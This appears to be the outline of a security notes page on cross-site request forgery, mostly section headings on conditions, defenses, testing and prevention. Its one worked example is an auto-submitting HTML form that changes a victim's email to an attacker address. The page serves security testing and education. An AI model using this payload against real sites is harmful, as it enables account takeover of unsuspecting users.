CSRF - Cross Site Request Forgery Attacks
CSRF (Cross-Site Request Forgery) - Overview
1. What it is
2. Three conditions needed for CSRF to work
3. How the attack actually looks
<form action="https://site.com/email/change" method="POST">
<input type="hidden" name="email" value="pwned@evil.net" />
</form>
<script>document.forms[0].submit();</script>4. Common defenses (and how each fails)
CSRF tokens
SameSite cookies
Referer-based validation
5. Testing checklist
6. Prevention (context for writeups)
Last updated